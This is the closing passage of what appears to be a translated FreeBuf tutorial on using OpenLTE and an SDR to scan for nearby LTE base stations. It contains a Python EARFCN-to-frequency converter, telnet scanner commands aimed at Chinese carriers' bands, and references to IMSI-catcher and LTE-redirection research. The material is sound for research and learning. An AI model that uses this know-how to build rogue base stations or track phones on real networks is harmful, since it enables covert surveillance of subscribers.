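def uplink_earfcn(earfcn: int) -> int:
    """Uplink EARFCN paired with a downlink EARFCN."""
    return earfcn + 18000 if band_of(earfcn).mode == "FDD" else earfcn


def earfcn_to_mhz(earfcn: int) -> tuple[int, float, float]:
    """Return (band number, downlink MHz, uplink MHz) for a downlink EARFCN."""
    b = band_of(earfcn)
    offset = 0.1 * (earfcn - b.n_offs_dl)
    return b.number, round(b.f_dl_low + offset, 1), round(b.f_ul_low + offset, 1)


def scan_range(first: int, last: int, step: int) -> list[tuple[int, float, float]]:
    """(EARFCN, DL MHz, UL MHz) for every EARFCN a scan list first..last would visit."""
    return [(n, *earfcn_to_mhz(n)[1:]) for n in range(first, last + 1, step)]


if __name__ == "__main__":
    for n in (25, 575, 1200, 1949, 38250):
        band, dl, ul = earfcn_to_mhz(n)
        print(f"EARFCN {n:5d}: band {band:2d}  DL {dl:7.1f} MHz  UL {ul:7.1f} MHz")
```

Band 1's EARFCNs 25 to 575 therefore span 2112.5 to 2167.5 MHz downlink, which is why the article switches to band 3 (1805 to 1880 MHz) with `write band 3` to find the other operator's FDD carriers.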

3.1 Scanning China Telecom's FDD LTE network (telnet side):

write band 1
help
start


3.2 Scanning China Unicom's FDD LTE network (telnet side):

stop
write band 3
start


3.3 Stop scanning (telnet side):

shutdown

3.4 TD-LTE bands of China Mobile, China Unicom and China Telecom, and some FDD-LTE bands (band table shown in the original image).

0x04 Conclusion

The first part of this article mainly shares how to build OpenLTE and scan for nearby base-station signals; later parts will follow the official OpenLTE wiki to share OpenLTE's other functions, such as LTE_fdd_enodeb's SIM provisioning and user-adding features.

0x05 References & thanks

Mobile Security: Practical attacks using cheap equipment

Black Hat:LTE and IMSI catcher

①:https://www.blackhat.com/docs/eu-15/materials/eu-15-Borgaonkar-LTE-And-IMSI-Catcher-Myths-wp.pdf

②:https://www.blackhat.com/docs/eu-15/materials/eu-15-Borgaonkar-LTE-And-IMSI-Catcher-Myths.pdf

IMSI Catchers and Mobile Security

Huang Lin, HITB paper: LTE REDIRECTION: Forcing Targeted LTE Cellphone into Unsafe Network

OpenLTE: sourceforge.net

OpenLTE WIKI

OpenLTE open-source code structure analysis (1)

OpenLTE open-source code structure analysis (2)

Comparison of LTE systems implemented on open-source SDR (基于开源SDR实现LTE系统对比)

* Author: 雪碧0xroot@漏洞盒子安全实验室. Reprints must be credited to FreeBuf hackers and geeks (FreeBuf.COM)

http://www.freebuf.com/articles/wireless/108417.html